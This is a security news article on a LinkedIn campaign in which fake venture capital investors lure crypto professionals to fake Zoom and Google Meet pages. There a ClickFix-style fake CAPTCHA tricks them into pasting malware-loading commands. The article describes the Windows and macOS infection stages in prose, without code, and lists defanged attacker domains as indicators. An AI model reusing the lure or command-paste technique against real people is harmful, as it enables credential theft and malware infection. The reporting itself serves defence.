FHN 
Security researchers have uncovered a coordinated malware campaign targeting people working in the cryptocurrency and Web3 industry.
Attackers pretend to be venture capital investors on LinkedIn and approach professionals with fake funding opportunities. Their goal is to trick victims into running malicious commands on their own computers.
The campaign combines social engineering, fake meeting links, and a ClickFix-style CAPTCHA trick to infect both Windows and macOS systems.
Fake Venture Capital Identities on LinkedIn
The attackers create convincing LinkedIn profiles that appear to belong to executives from investment firms. Some of the fake firms used in the campaign include:
- SolidBit Capital
- MegaBit
- Lumax Capital
Using these profiles, the attackers send personalized messages to founders, developers, and community members in the crypto space.
The messages often mention the victim’s recent work or projects to make the approach look genuine.
After starting a conversation, the attacker quickly suggests a meeting to discuss investment or partnership opportunities.
Fake Meeting Links Used to Deliver Malware
Instead of normal corporate meeting tools, victims are directed to Calendly booking pages. These pages then redirect them to fake Zoom or Google Meet websites controlled by the attackers.
Some of the malicious domains include:
- zoom[.]us07-web[.]us
- hedgeweeks[.]online
These websites look like legitimate meeting platforms but are designed to deliver malware.
Moonlock Lab researchers reported that one victim interacted with a LinkedIn profile named “Mykhailo Hureiev,” who claimed to be the co-founder of SolidBit Capital.
The person insisted on using their own meeting link and became suspicious when the victim suggested using a legitimate Google Meet session.
Domain registration records later showed that several related websites were registered under the name “Anatolli Bigdasch” from Boston, whose identity is also connected to a LinkedIn profile claiming to run SolidBit Capital.
Researchers also discovered domains like lumax[.]capital, suggesting that the attackers continue creating new fake companies as older identities get exposed.
ClickFix Technique: Fake CAPTCHA Leads to Malware
When a victim opens the fake meeting link, they are taken to a webpage that looks like a conference site or news article.
The page displays a fake Cloudflare CAPTCHA asking users to confirm they are not a robot.
However, the CAPTCHA is completely fake and controlled by the attackers.
The infection process happens in three steps:
- A fake CAPTCHA checkbox appears on the page.
- Clicking the box secretly copies a command to the user’s clipboard.
- The page then instructs the user to open a terminal and paste the command to complete “verification.”
Because the victim runs the command manually, many security protections such as download filtering or exploit detection may not activate.
Malware Execution on Windows and macOS
On Windows systems, the command launches a hidden PowerShell process.
It decodes a Base64 payload that downloads a script from the attacker’s server and runs it directly in memory.
This fileless technique allows attackers to deploy additional malware without leaving obvious files on disk.
On macOS, the process uses a multi-stage bash command.
The script checks whether Python is installed, installs required tools if needed, and then downloads a Python-based malware payload.
Researchers also identified Mach-O malware files used in the campaign that initially showed zero detections on VirusTotal.
Additional analysis found fake Zoom applications written in Swift. These applications imitate legitimate password prompts and send stolen credentials to Telegram while delivering different payloads for multiple operating systems.
Possible Links to UNC1069
Some aspects of the campaign resemble activity linked to UNC1069, a financially motivated group associated with North Korea that previously targeted cryptocurrency companies using fake Zoom meetings and ClickFix techniques.
Both operations share several similarities:
- Zoom-like domains used for phishing
- Social engineering through LinkedIn or messaging platforms
- Malware commands tailored for Windows and macOS systems
However, Moonlock Lab says there is not enough evidence yet to confirm that the same group is responsible.
How Professionals Can Protect Themselves
Security researchers advise crypto professionals to carefully verify any unexpected investment or partnership offers.
Always confirm the legitimacy of companies and domains, especially when the organization has a very recent online presence.
Be cautious if conversations quickly move away from LinkedIn or email to external meeting links. It is safer to independently verify the meeting platform before joining.
Most importantly, never run commands in a terminal when instructed by someone online. Legitimate investors, recruiters, or event organizers will never ask users to paste commands into their system as part of a verification process.
Indicators of compromise (IOCs)
| Type | Value | Context |
| Domain | zoom[.]us07-web[.]us | Fake Zoom page, hosts ClickFix payload |
| Domain | zoom[.]07usweb[.]us | Fake Zoom page, hosts MegaBit fake company site |
| Domain | zoom[.]us05-web[.]us | Fake Zoom page, multi-platform payload server |
| Domain | goog1e[.]us-meet[.]com | Fake Google Meet page |
| Domain | hedgeweeks[.]online | C2 server; typosquat of Hedgeweek (hedgeweek.com) |
| Domain | lumax[.]capital | New campaign infrastructure (registered 2026-02-02) |
| URL | calendly[.]com/hureivemykhail/with-solidbit-meeting | Calendly link used in social engineering |
About the Author
